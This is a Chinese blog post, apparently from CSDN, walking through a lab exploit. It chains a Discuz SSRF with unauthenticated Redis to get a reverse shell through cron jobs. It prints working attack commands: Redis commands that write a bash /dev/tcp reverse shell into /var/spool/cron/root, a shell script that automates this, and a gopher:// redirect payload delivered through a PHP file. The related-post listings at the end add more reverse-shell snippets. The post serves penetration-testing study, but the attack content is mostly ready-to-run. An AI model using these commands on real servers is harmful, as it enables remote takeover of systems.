mysql 反弹shell_Discuz-ssrf利用计划任务反弹shell

最新推荐文章于 2024-05-19 10:11:12 发布
最新推荐文章于 2024-05-19 10:11:12 发布
阅读量243 收藏
点赞数
文章标签: mysql 反弹shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39634898/article/details/113438337
版权

#001 环境搭建:

Centos7(安装有apache,php,mysql,redis)

利用winscp把discuz的源码拖到var/www/html目录下:

chmod -R 777 upload/改一下权限

然后访问192.168.136.133/upload进行安装,但是访问的时候愣是给我提示目录不存在,并且相关文件不可写

1c73895e9167a04f08a69092e9a74357.png

但是查看权限是有的

84132711a24ca475b1a43cf177f09639.png

经过各种尝试无果,开始了漫长的百度之旅,皇天不负有心人,我看到了一位兄弟和我有类似的悲惨经历,以下是他的心声:

9a48c337536922fd237a15ab8d987295.png

我赶紧打开我的centos7敲了一波:setenforce 0e5cd15c4bc4999c5a60efa7e2332342a.png

再次打开浏览器访问192.168.136.133/upload目录,全部正常了:1185e1136d1caf9e0adbc2a9c7045de2.png

根据提示点击下一步,终于看到了熟悉的面孔4baa8e87271bd042a502e035a2ea0e3b.png

访问一波正常,到此环境搭建完成:75d446a2e4469dd4a2c187dc045b60d6.png

#002 漏洞复现操作:

本地操作利用计划任务反弹shell

复现环境:win7(装有nc),centos7-discuz+redis

Win7开启nc监听:8b69947a5eb95b1cb1afcc0bf1a5aa4c.png

Centos7首先开启redis服务:

ef1831052aca4335a64de8b8fb3f3831.png

操作redis写计划任务反弹shell,在redis-cli中输入以下命令:

set x "\n* * * * * /bin/bash -i > /dev/tcp/192.168.136.132/6666 0&1\n"

config set dir /var/spool/cron/

config set dbfilename root

save

7a452a53122519d2bf2e904c69d3e4c2.png

回到win7中查看结果,成功接收到反弹的shell:31f5d34c7aa86a045735894b7bfc4c01.png

执行以下命令 /usr/sbin/ifconfig,本地利用计划任务反弹shell就成功了7d190c66519b4045671f73bfe026ce5b.png

#004 公网服务器利用gopher协议来写计划任务:

先写一个shell脚本,输入一下命令,保存为shell.sh,并上传到centos7:

redis-cli -h $1 -p $2 flushall //可不写

echo -e "\n\n*/1 * * * * bash -i >& /dev/tcp/192.168.136.132/3333 0>&1\n\n\n"|redis-cli -h $1 -p $2 -x set 1

redis-cli -h $1 -p $2 config set dir /var/spool/cron/

redis-cli -h $1 -p $2 config set dbfilename root

redis-cli -h $1 -p $2 save

redis-cli -h $1 -p $2 quit

win7用nc开启监听,bash命令执行shell/sh,看到ok代表执行成功da903c2e18f145e19e67634deefce666.png

回到win7查看返回结果,成功接收到反弹的shell

cf401790dbee21523f6b50e300ab9b22.png

我们想要抓取redis攻击tcp的数据包,可以使用socat端口转发。

Socat命令进行端口转发,把本地6379转发到2222端口,监听2222端口,抓取tcp数据包:

socat -v tcp-listen:2222,fork tcp-connect:localhost:63799b29b26aefeb7d04b0073d5770ec545b.png

bash命令执行shell.sh脚本,并且带上127.0.0.1 222245ac0ff88cf7742b0baf388f233ee94b.png

可以看到成功抓取到了tcp数据包,然后将抓取到的内容复制,并保存为1.log4abe79a5c29f71d7e1f2ef8c6da62973.png

利用redis_ssrf.py脚本转换1.log,生成payloada7ac9a52a5f8832e1b7cf537f695c0e2.png

将生成的payload放入公网的文件gopher.php中

header("Location:gopher://127.0.0.1:6379/_payload");

?>

ba754c4f2ee8a6185f5bef5ecb47ebe8.png

Win7开启nc监听6666端口,然后discuz访问payload就会反弹shell

2e9acae1715613dcfbecf2ef7a1109d1.png

3dc70e7cc18c1dcdaae29b28cea12103.png

weixin_39634898
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql 反弹shell_Linux下几种反弹Shell方法的总结与理解
weixin_39929465的博客
01-27 1392
*本文原创作者:LlawLiet,本文属FreeBuf原创奖励计划,未经许可禁止转载。之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上...
mysql 反弹shell_mysql mof+metasploit反弹shell
weixin_35895056的博客
01-27 761
metasploit已经有针对该方式的利用代码,原理还是一样生成mof文件,只是metasploit中可以使用到反弹技术,就不用额外添加用户,前提是对方服务器允许访问公网useexploit/windows/mysql/mysql_mofsetpasswordxxx//设置登录mysql的密码setusernamexxx//设置登录mysql的用户setrhostxx...
玄机-第二章日志分析-mysql应急响应
最新发布
JACKBREAK的博客
05-19 1375
玄机应急响应靶场日记
mysql反弹shell
weixin_40416851的博客
02-10 739
metasploit已经有针对该方式的利用代码,原理还是一样生成mof文件,只是metasploit中可以使用到反弹技术,就不用额外添加用户,前提是对方服务器允许访问公网。
mysql 反弹shell_golang反弹shell脚本
weixin_31293685的博客
01-27 220
一、Golang语言package mainimport ("fmt""net""strings""io/ioutil""log""os/exec")func cmd_connect(c net.Conn) {if c == nil {return}buf := make([]byte, 4096)for {cnt, err := c.Read(buf)if err != nil || cnt =...
mysql反弹shell_MySQL Rootkit 反弹Shell--PHP
weixin_39520013的博客
01-19 288
好多人在渗透的时候,知道得到了SA的密码知道该怎么办,但是得到了MYSQL的root密码之后却迷茫了(多说句废话,默认在windows文件夹中保存my.ini里面写有root密码,而且windows有访问的权限,我们学校的服务器就是这么搞到的,汗···),我当初就迷茫过。后来得知用UDF create新函数可以执行命令,但是有时候却会出现意外的情况等等利用不是很好。终于有一天JOLI大叔随手抛给我...
SSRF_Vulnerable_Lab-master.zip
10-21
备份,github:https://github.com/incredibleindishell/SSRF_Vulnerable_Lab
ssrfpll.rar_DQ 锁相环_SSRF-PLL_同步锁相环_锁相环_锁相环 同步
07-14
基于同步坐标系的自建锁相环模块仿真,dq坐标系与matlab自带模块相差90度,新建的dq坐标系是符合中式习惯坐标系
Microsoft_Exchange_Server_SSRF_CVE-2021-26855:Microsoft Exchange Server SSRF防御(CVE-2021-26855)
03-08
Microsoft_Exchange_Server_SSRF_CVE-2021-26855 zoomeye dork:app:“ Microsoft Exchange Server” 使用Seebug工具箱及pocsuite3编写的脚本 ,对近一年的数据进行探测: 成功率大约:1500/5000 = 30%
「NGFW」Build_Your_SSRF_Exploit_Framework - 解决方案.zip
11-29
「NGFW」Build_Your_SSRF_Exploit_Framework - 解决方案 安全对抗 基础架构安全 安全集成 漏洞分析 数据库审计
「威胁情报」Build_Your_SSRF_Exploit_Framework_SSRF_漏洞自动化利用 - 渗透测试.zip
12-01
「威胁情报」Build_Your_SSRF_Exploit_Framework_SSRF_漏洞自动化利用 - 渗透测试 业务风控 Android 等级保护 等级保护 安全方案
mysql_reverse_udf.zip
08-02
mysql反弹端口提权利用dll文件。
SSRF_Vulnerable_Lab:本实验包含易受服务器端请求伪造攻击的示例代码
05-12
我想对@ albinowax,AKReddy,Vivek Sir(感谢一直以来支持我的杰出人物),Andrew Sir-@vanderaj(感谢他的鼓励)以及在DNS重新绑定攻击基础上共同努力的研究人员说谢谢 脆弱代码旨在针对以下5种情况演示SSRF: 1....
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_exSSRF漏洞测试、利用 SSRF vulnerability testing and utilizationSSRF[+] 服务端请求伪造,当作跳板攻击内网服务[+] 扫描内部网络、服务[+] 访问本机敏感文件[+] 向特定端口发送数据包、payload.├── ...
uptime-checks-ssrf
04-06
这是视频,介绍在那里发现的31,000美元盲SSRF的理论:该实验室只是一个模拟,它使您可以尝试使用视频中介绍的盲目数据泄露的先进技术来尝试编写利用程序的技能。 有一个公开的服务可以模拟GCP控制台的“正常运行...
第三节 SSRF利用 - 内网资源访问-01
09-15
"第三节 SSRF利用 - 内网资源访问-01" 本节课程主要讲解了SSRF漏洞的_php_函数,包括file_get_contents、fsockopen()和curl_exec()三个函数的使用和可能存在的漏洞。 SSRF漏洞的定义 SSRF漏洞全称为Server-side ...
mysql 反弹shell_反弹shell升级成交互式shell
weixin_39640573的博客
01-27 591
实验环境:A : kali 虚拟机B: centos7.5 虚拟机1. A 机 kali 虚拟机 设置监听 端口root@kali64:~# nc -lvvp 9001# 端口随便定义,没被使用就行2. B机 执行命令反弹shell[root@localhost ~]# bash -i >& /dev/tcp/192.168.2.128/9001 0>&1# ip地...
windows 已拿到mysql权限最简单的反弹shell方式
YZBPXX
12-05 630
大多数人mysql密码是123456 这个时候如果还开放了该端口 可就危险了 需要运行的是5.x版本的mysql (一般老师教学都是这个版本) 对比网上powercat 脚本多了步把powercat替换成nn命令,这样windows就无法检测出病毒,同时使用vbs 来运行bat也使得用户不易察觉。 注意以下是将病毒植入开机启动程序,需要开机时才能启动 服务器需要做的事 将脚本上传到客户端可以访问的地方(如启动自带的aphacl,将脚本添加到index.html文件的链接里) 服务器启动nc -.
weblogic ssrf 反弹shell
09-16
### 回答1: ...总之,利用WebLogic SSRF漏洞反弹shell是一种非法行为,违反了计算机系统的安全和隐私。我们强烈建议所有用户和管理员采取适当的安全措施来保护WebLogic服务器免受此类漏洞的攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值